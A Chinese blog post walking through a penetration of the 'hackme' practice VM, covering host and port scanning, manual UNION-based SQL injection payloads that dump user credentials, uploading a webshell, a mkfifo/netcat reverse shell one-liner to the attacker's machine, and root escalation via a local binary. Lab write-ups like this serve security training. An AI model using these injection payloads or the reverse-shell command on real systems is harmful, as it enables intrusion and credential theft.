hackme靶机渗透~SQL注入+文件上传

最新推荐文章于 2024-09-15 22:09:27 发布
最新推荐文章于 2024-09-15 22:09:27 发布
阅读量390 收藏 5
点赞数 4
分类专栏: 靶机练习 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67832625/article/details/141109871
版权

在这里插入图片描述

0x01信息收集

# 主机发现
arp-scan -l

image-20240801221745822!

# 端口扫描
nmap 192.168.66.0/24 --min-rate=1000

image-20240801221959809

# 目录扫描
dirsearch -u http://192.168.66.142

image-20240801222348567

0x02漏洞挖掘

SQL注入

# 进入主页发现登录页面,而且还可以注册用户

image-20240801222502122

# 注册用户 账号:admin 密码:password

image-20240801222805695

# 登录用户查看内容,点击search,发现有书单

image-20240801223115624

# 验证sql注入

image-20240801223603773

image-20240801223637994

# 发现存在SQL注入,使用sqlmap进爆库
sqlmap -u "http://192.168.66.142/welcome.php?id=1" --batch

image-20240801224611096

发现sqlmap没有扫出来,所以我们使用手工注入

# 使用手工注入   判断字节数
Windows OS' order by 4#

image-20240801224926135

image-20240801224946287

判断字节数是3

# 判断回显位置
1' union select 1,2,3 #

image-20240801225154975

# 判断数据库名
-1' union select database(),2,3#

image-20240801225424108

# 查看webapphacking下的所有表
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

image-20240801225544815

# 查看users下的所有的字段
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

image-20240801225658267

# 查看user和pasword中的数据
-1' union select group_concat(user),group_concat(pasword),3 from users#

image-20240801225838190

# 将密码用MD5来解码  账号:user1 密码:hello

image-20240801230045591

剩下的用户名和密码用 一样的方法解决即可,这里就不一一列举。

文件上传

# 我们是用刚才爆破的账号和密码来登录,可以发现文件上传点

image-20240811154043293

# 上传木马并抓包进行测试连接

image-20240811154144631

image-20240811154419136

# 尝试访问一下,看一下上传的文件

image-20240811154718209

0x03反弹shell

# 可以看到我们上传的木马成功回显,直接用中国蚁剑进行连接

image-20240811154940116

# 我们在kali上开启一个监听端口8888
nc -lvvp 8888

image-20240811160522799

# 在蚁剑上输入讲shell反弹给kali
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.66.128 8888 >/tmp/f
     # ip为kali攻击机的   端口是kali开启的监听端口

image-20240811160836880

0x04 提权

# 识别现在所存在的用户
cat /etc/passwd | gerp /bin/bash

image-20240811161714149

# 在/home/legacy路径下发现一个二进制文件touchmenot,我们通过执行此文件发现提权到root用户
cd /home/legacy
./touchmenot

image-20240811162014587

这个靶场主要是让我们发现SQL注入,然后并进行提权。

好小子,离成功又近一步啊。

蚂蚱.top
关注
专栏目录
hackme web wp(全)
zhwho的博客
04-07 1300
HackmeCTF—WP WEB 1.hide and seek 根据题目意思猜测网页源代码里可能会有 提示,右键查看网页源代码,发现flag 2.guestbook 看到no data,点击new post可以插入新的数据,然后再回到message list可以看到刚才插入的数据,点进去阅读,看到可疑的URL:?mod=read&id=152如图2.1 图2.1 尝试SQL注入 首先...
Hackme靶机渗透
m0_50584370的博客
06-01 260
hackme靶机渗透
hackerme2靶机渗透~SQL注入+命令执行
weixin_67832625的博客
08-12 521
本文主要是SQL注入和命令执行的漏洞进行挖掘,并且对最后的提权一个靶机练习,笔者用最详细的介绍和讲解,有任何问题随时反馈给作者
Hackme_1靶机渗透 (新手推荐)主要考点SQL注入文件上传
m0_64429364的博客
09-19 314
hackme_1详细解释
hackme-1靶机渗透详解
weixin_63124284的博客
10-13 839
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。这个实验室是为了模拟现实生活环境而创建的。
hackme靶机渗透
Tender*的博客
08-02 117
hackme靶机渗透
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6672
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
靶机渗透 HACKME-2 (详细渗透,适合新手渗透
君莫hacker的博客
09-06 4066
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
靶机渗透hackme1
weixin_64267091的博客
01-04 909
对于vulnhub中的靶机,我们都需先下载镜像,然后导入VM,并将改为NAT模式。首先我们再来看一下靶机渗透的步骤:信息收集-漏洞分析-漏洞利用-提权。基本都是这个三个步骤,接下来开始我们今天的靶机渗透吧!
渗透测试靶机实战-SQL注入getshell
yummy11111的博客
07-18 887
SQL注入getshell靶机实战
vulnhub - hackme 考点:(sql注入&上传&linux信息搜集)
冬萍子癸水
04-23 685
https://www.vulnhub.com/entry/hackme-1,330/ nat网络, arp-scan -l 扫出来比平常多的ip就是靶机 nmap看到80当然是web信息搜集,22想到找ssh登录信息 80看到登录框就注入干他,但是没用,可以注册,先注册吧。。 其他没收集到多少亮眼信息, 进入后是搜索书的搜索框。这种搜索框数据交互当然要想到注入了。。 试了几次,什么也别输入,点回...
sqlalchemy JSON 字段写入时中文序列化问题
llc的博客
09-12 301
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
text2sql(NL2Sql)综述《The Dawn of Natural Language to SQL: Are We Fully Ready?》
最新发布
beingstrong的博客
09-15 595
text2sql(NL2Sql)综述《The Dawn of Natural Language to SQL: Are We Fully Ready?》详细笔记
SQL(结构性查询语句)
2301_78693337的博客
09-11 444
以上就是今天要讲的内容,本文介绍了基础的SQL语法使用,而sql还提供了大量能使我们快速便捷地处理数据的函数和方法等着我们探索。
大数据-132 - Flink SQL 基本介绍 与 HelloWorld案例
永远好奇,无限进步!
09-12 2261
Flink SQL 是 Apache Flink 提供的一种高层次的查询语言接口,它基于 SQL 标准,为开发者提供了处理流式数据和批处理数据的能力。Flink SQL 允许用户使用标准 SQL 查询语言在数据流和数据表上执行复杂的操作,适用于多种应用场景,如实时分析、数据流处理、机器学习等。Flink SQL 的一大特点是流处理和批处理的统一性。通过同一套 SQL 语法,用户可以同时处理静态数据(批处理)和动态数据(流处理)。这使得应用程序的开发更加简化,因为可以用相同的逻辑编写实时流数据处理和历史数据的
sqlserver常用的sql命令
2301_76664379的博客
09-11 697
备注:D 表示全备份,i 表示差异备份,L 表示日志备份。
mysql DBA常用的sql
weixin_44550507的博客
09-12 658
DBA常用sql,方便性能优化
DC3靶机渗透实战:从信息收集到SQL注入漏洞利用
42033.txt文件中的信息指示了一个特定的SQL注入点,我们可以使用sqlmap工具进行进一步攻击。值得注意的是,攻击过程中,攻击者会设置风险级别、代理随机性等参数以提高攻击的灵活性和安全性。 在实际操作中,我们将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值